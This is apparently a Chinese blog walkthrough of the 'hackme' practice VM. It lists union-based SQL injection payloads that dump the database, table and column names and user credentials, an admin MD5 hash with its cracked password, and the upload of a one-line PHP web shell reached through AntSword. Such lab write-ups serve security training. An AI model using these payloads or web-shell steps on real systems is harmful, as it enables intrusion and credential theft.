目录

hackme靶机通关攻略

hackme靶机通关攻略

第一步:确定靶机IP

https://i-blog.csdnimg.cn/img_convert/46397cd4eb0604c52a398e25e8c56425.png

第二步:使用御剑后台扫描工具扫描敏感文件

https://i-blog.csdnimg.cn/img_convert/9920b4aa6f670129b70505de4226e5b6.png

第三步:访问register.php注册登录,进入welcome.php页面

https://i-blog.csdnimg.cn/img_convert/8e4671dc96fca01560b56f2930c95291.png

第四步:访问一个不存在的页面,确定网站使用的中间件是Apache(无用)

https://i-blog.csdnimg.cn/img_convert/94b3eec434a889b0ca0ccea0ea4bdcb3.png

第五步:返回welcome.php页面,单点search会出现很多书,推测存在SQL注入漏洞

https://i-blog.csdnimg.cn/img_convert/dd05988b1a89c86d5cb3cb65870e9b30.png

第六步:确定闭合方式为单引号

https://i-blog.csdnimg.cn/img_convert/7a4f3cbbed5d5835ad260507174cf252.png

第七步:判断字段数为3、判断回显位置

https://i-blog.csdnimg.cn/img_convert/98e292c4d816c92e52168e6e57bfc910.png

https://i-blog.csdnimg.cn/img_convert/baffa04897b43ad879e5229d38046b38.png

第八步:爆破数据库名、爆破表名、爆破字段名

https://i-blog.csdnimg.cn/img_convert/db28cfc1ec9543acc2a78d996dfaa745.png

https://i-blog.csdnimg.cn/img_convert/c1943236e8352472fe2e5e84a3733b0f.png

https://i-blog.csdnimg.cn/img_convert/16e1da0d7361d5e77ee43924194e18b2.png

https://i-blog.csdnimg.cn/img_convert/1ef7d656c98f07d5e09244601143117e.png

#爆破数据库名
OSNT' union select database(),2,3#

#爆破表名
OSNT' union select 1,2,table_name from information_schema.tables where table_schema='webapphacking'#

#爆破字段名
OSNT' union select 1,2,column_name from information_schema.columns where table_name='users'#

#爆破敏感信息
OSNT' union select 1,2,group_concat(name,'~',pasword) from users#

#发现管理员账户
superadmin~2386acb2cf356944177746fc92523983

#MD5解密密码
Uncrackable
第九步:登录管理员账户,发现上传文件的地方,尝试直接上传一句话木马shellshellshell.php

https://i-blog.csdnimg.cn/img_convert/e4693d9a62e0144564b88330c3e8fc46.png

https://i-blog.csdnimg.cn/img_convert/32de5df7c04bae137d782cb1ed98017c.png

第十步:访问 ,发现成功上传,使用蚁剑连接,成功!

https://i-blog.csdnimg.cn/img_convert/7e144d5d94b96263560a0048a576b928.png

https://i-blog.csdnimg.cn/img_convert/b02c8aa21c34291fa6319cfddc3680ff.png

FROM  IYU_